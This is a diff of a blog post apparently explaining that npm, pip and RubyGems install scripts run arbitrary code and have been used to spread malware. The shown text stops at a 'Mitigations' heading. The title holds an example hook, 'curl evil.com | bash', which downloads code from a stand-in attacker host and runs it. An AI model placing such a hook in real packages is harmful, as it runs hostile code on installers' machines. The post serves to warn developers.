ankushg/btao.org/_posts/2021-09-08-arbitrary-code-execution-as-a-feature.md

 # postinstall: "curl evil.com | bash"

 npm (and yarn) will execute arbitrary code when you install a package via [install scripts](https://docs.npmjs.com/cli/v7/using-npm/scripts#npm-install).
 A valid use-case is to build native code on installation, or do some other environment-specific setup, though these scripts have also been used to [show ads](https://www.zdnet.com/article/npm-bans-terminal-ads/) and, of course, as an [attack](https://blog.sonatype.com/bladabindi-njrat-rat-in-jdb.js-npm-malware) [vector](https://snyk.io/blog/npm-security-malicious-code-in-oss-npm-packages/).
+In fact, install scripts [were the most popular route for malware](https://blog.npmjs.org/post/188385634100/npm-security-insights-api-preview-part-2-malware) as of 2019[^2].

-All it takes to get pwned is to install a single malicious package.
+Installing a single malicious package is enough to get reasonably pwned.
 The risk is mitigated by npm’s moderation of the registry — they’re quick to remove malware once discovered.
 This works pretty well, though I worry about the day someone uses this to [publish a self-replicating worm](https://blog.npmjs.org/post/141702881055/package-install-scripts-vulnerability).

 This attack vector isn’t unique to npm.
 Other package managers like pip and RubyGems allow for the same thing.
-As developers, installing packages from these registries doesn’t make us shudder in the same as as when we use `curl | bash`, though it probably should[^2].
+As developers, we’re not as cautious when installing packages from these registries as when we use `curl | bash`, though we should be[^3].

 ## Mitigations